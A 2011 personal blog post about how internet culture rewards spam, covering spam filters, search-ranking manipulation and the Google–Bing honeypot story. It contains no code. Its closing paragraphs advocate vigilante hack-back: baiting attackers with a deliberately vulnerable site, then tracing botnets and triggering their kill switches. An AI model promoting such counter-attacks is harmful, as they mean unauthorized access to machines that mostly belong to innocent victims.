Even One Word

The Blog of Nathan St. Pierre


The New Culture of Spam Thursday, February 3, 2011

I realize I'm not the first one to talk about this, (see Cory Doctorow's thoughts on the subject), but the nature of the internet and spam have changed over the years.

It used to be that you protected your e-mail address as though it were the most secretive information in the universe, next to the last four digits of your social and your weight (and/or age, depending on your gender and personality). But, just like the last four digits of your social, your weight, your age, and even probably about how much money you make, your info is all over the freaking place. But this isn't just the case on e-mail, it is the case with blogs, forums, and any form of communication which would ever require a turing test. As of right now, I have about 200 comments on my blog, and only 4 of them are legitimate. So how did people fight this?

  1. Obfuscate your e-mail address like name (at) domain (dot) com.
  2. Turn off comments on your blog.
  3. Employ a site admin, moderator, or other full/part-time culler of the wheat from the chaff (or the spam from the real meat, whichever analogy fits your dietary restrictions best).
  4. Use the aforementioned turing test anywhere that allows human input.
  5. Automation.
The problem we have with every one of these is that they are all treatments for symptoms of an underlying disease. As far as which of these symptom treatments works best? The shortest and last one, of course! The 200 comments on my blog, around 190ish of which are marked spam, were filtered by a plug-in most wordpressers know as Akismet. My public e-mail (nathan@nathanstpierre.com, btw) is in no way obfuscated or filtered, because it goes through g-mail, which has (as far as I've seen) the most intricate spam filtering system available to a public mail system. As Mr. Doctorow so intellectually pointed out, these systems exist for exactly this reason, so why not utilize them?

That being said : I still think the underlying disease goes untreated. Unfortunately, this disease is the same one that ruined the old-school forums, social media (MySpace whores anyone?), and even legitimate community tools (buy something from someone who's not a Nigerian in Craig's List. I dare you.). It is the chief weakness and strength of the Internet: freedom. The freedom of an open and endless system is that you end up ultimately having to be at the mercy of the demographic that utilizes it.

Great examples of the successes of this philosophy include Open Source (none of us is as smart as all of us), Wikipedia (the nice people who care will ultimately win out over the jerks, because they are not doing the easy thing, they're doing the thing they care about). The failures of this freedom are pretty much the inverse: Reporting of false information on national TV thanks to the Bogus Blogosphere, entire systems being overrun by spammers (Google groups anyone?) and so forth. So is there a cure?

In the spirit of presenting a solution rather than a problem, I suggest a change. Not a change in software or business models, a change in philosophy. We once thought the internet was too massive and too free to infringe upon, but YouTube shattered that preconception to me when they freaking scanned a video for copyrighted material. Could software ultimately determine what's spam and what's legit and be a part of every ISP's basic network protocol, insta-deleting anything that clutters their domains with horrendous spam? Potentially. But should it?

Honestly that kind of big brother dystopia --which would likely lead to my favorite cyberpunk plots being possible-- makes me think that's the more mechanical answer, which completely ignores the spirit of the issue, which is a cultural question. The culture of the internet has become beneficial to spam.

But this is a blog about web development! you say? How does being a hippie and talking about working for a new society help anything?

Well, algorithms are great, but as Google is finding out, they're not the answer to everything (or what we call a silver bullet). For more information on an example where someone gamed Google's algorithm in a seriously negative manner, check out the story of DecorMyEyes. To summarize: a shady businessman discovered that Google ranks things based on how often people mention your site, along with certain search terms. So he discovered that people blasting him on a thousand ripoff sites about his failure to manage their (insert glasses brand name here) order the correct way, would cause his site to show up first for someone looking for (insert brand name here) and/or "glasses." Google's response? Essentially, change the algorithm (to see their actual response read here).

... in the last few days we developed an algorithmic solution which detects the merchant from the Times article along with hundreds of other merchants that, in our opinion, provide an extremely poor user experience. The algorithm we incorporated into our search rankings represents an initial solution to this issue, and Google users are now getting a better experience as a result.
Is this a good solution? Honestly, it's probably the best solution given the situation. They explain this in the article, but they point out that just blocking this person or using sentiment analysis (filter of good vs. bad reviews) could cause the inverse problem to happen: game the system and post a million bad reviews of Best Buy and suddenly they never show up in Google searches for Best Buy.

But what's happened pretty recently with them and Microsoft's Bing makes me think the algorithm isn't the solution, it's the problem. If you haven't heard the latest news, check out this article from Seattle's own KIRO TV. Essentially, Google set up a "honeypot" by putting out some completely random result sets for random character searches, and Bing turned up the same results. Now unless they figured out how to steal one of the most carefully guarded algorithms in the tech industry, I highly doubt this would happen as a freak accident. It's pretty clear Microsoft is doing something sketchy. Whether they are or not, let's say someone at some point did. This would prove my point: the world ultimately doesn't care whose algorithm it is. If you can steal it, where's the incentive not to?

So we come back to the issue: the culture of spam. As YouTube discovered (I'm sure through Google's technology), there are ways to automatically figure these things out. As I said before, it was probably the best of the options we have at the moment, but we honestly need to find a better way to approach this. For this, I go back to what I mentioned earlier: f*cking Wikipedia and open-source: how do they work?

They work by having the appropriate balance of resources, both personnel and technology. Enough coders are willing to clone your git repository of a new build and try to break it. This is hard and challenging. This scares off spammers, who will try to take the easiest and possibly fastest route through the maze to the cheese. People who are earnestly devoted to a cause will always inevitably find a way over people who are lazily employing practices that work by gaming systems. Why?

Ask the Russians, who spent the entire cold war stealing and duplicating western technology to master and decrypt it just in time to be three generations behind their innovating enemies. The Black Sunday Kill is a better example of this in action in the technology world.

So ultimately, what is the exact mechanism by which we can make search engines, blogs, e-mail and so forth unspammable? I don't know. Not that I'm incapable of figuring that out, I think someone at less than my skill level can easily figure this out given enough incentive (usually motivation like anger and resources like free time). But the ultimate solution will be counter-acting the current disease: spammers are making money.

Every one of the ads you get that advertise "A bigger Pen15" makes money, because someone who got that e-mail sent money to someone. Every time a Nigerian princess is ransomed in your e-mail, some gallant fellow cashed out his 401(k) to save her. That one man's $5,000 is worth orders of magnitude more than the cost of sending out those spams mails, which could vary from a few hundred dollars for millions of e-mails to a dollar for thousands (depending on the location of the servers and the botnet being used). There are lots of resources that discuss this, but my favorite right now is the HowStuffWorks explanation.

So the solution seems simple enough, just keep them from making money! But how do we approach this?

Well, we've tried education on massive scale: from teaching your grandparents not to click on spam to educating your children through computer literacy about scamming. We've tried blocking those parts of the internet from people to protect them from themselves. We've tried spam-blockers, captchas, and every automation system possible. But these ALL address the symptoms. Even trying to legislate against spam has ended up being a pipe dream (and honestly legislation just makes breaking laws more fun for those who'd want to do that in the first place). My proposed solution at this moment?

Make them pay.

Legislation proposes fines, but the problem with legislation is it's only justifiable if we can prove beyond a shadow of a doubt that suspected perpetrators are in fact perpetrators. I say, we employ the same annoying bastard tactics that we saw in use against the enemies of Julian Assange. Will it be easy? HELL NO.

As we all know, spammers utilize botnets and hordes of zombies, so tracking down all of those spam-emails will most likely lead you to victims instead of perpetrators. On top of this, they often launch attacks such as DDoS or ping-storms to people who attempt to track them down. But these are issues we can address. When these hackers take over a computer, they always leave a back door in order to access it for their various uses. They even come with a kill switch so that they can revert the server/computer/device so others can't use their system against them. Most of these systems are freely available, and finding the kill switch is just a matter of knowing which attack was launched against your site. They hide their location and just send an anonymous text or e-mail or packet of data to the zombie herd... which makes for a perfectly good honeypot. Intentionally leave a site open to RFI attack, for example, and then monitor any packets that come into the system. When one does, you can find the source. Most likely, it'll be from behind a series of hops, firewalls, and other zombies, but now you at least know where that came from. Repeat this process enough times, and you find the root. At the very list, you can sniff out the net and either selectively block it, or keep a database of ip addresses logged with what software compromised them so when you find a killswitch, you have somewhere to attack.

Granted these are all ideas off the top of my head, but I'm only one man. And none of us is as smart as all of us, so let's do this. Let's get pissed, let's get serious, and let's change the culture of spam. Honestly, I think it's about time the white hats did something other than just turn up their noses at software piracy. And I'm ready to help.